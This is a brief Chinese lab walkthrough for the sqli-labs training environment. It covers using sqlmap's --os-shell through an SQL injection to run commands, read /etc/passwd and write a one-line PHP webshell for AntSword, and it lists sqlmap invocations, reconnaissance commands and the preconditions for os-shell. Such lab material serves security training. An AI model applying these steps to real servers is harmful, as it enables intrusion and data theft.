文章目录
sqlmap-读写文件-执行命令-基础实验
实验内容
步骤1. 访问目标机web页面
- sqlmap-读写文件-执行命令-基础实验
- 实验内容
- 步骤1. 访问目标机web页面
- 步骤2. 发现注入点
- 步骤3. 进入os-shell交互界面
- 步骤4 选择网站语言
- 步骤5 输入网站的绝对路径
- 步骤6. 读取网站敏感文件如/etc/passwd
- 步骤7.在当前目录下写入任意文件,这里我写入shell.php一句话木马
- 步骤8.使用蚁剑执行
- 总结
- 免责声明
python sqlmap.py -u http://192.168.232.243/sqli-labs-master/Less-3/?id=2
python sqlmap.py -u http://192.168.232.243/sqli-labs-master/Less-3/?id=2 --os-shell
C:/phpStudy/WWW/
dir
ifconfig
net user
echo "" >123.php
–os-shell的执行条件有三个
-
1.网站的权限必须是root
-
2.需要直到网站的绝对路径
-
3.GPC为off,php主动转义功能关闭
小技巧:
在使用–os-shell进行交互之前可以使用–is-dba 来判断是否能够进行shell交互,节省时间。 
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果上传者概不负责!
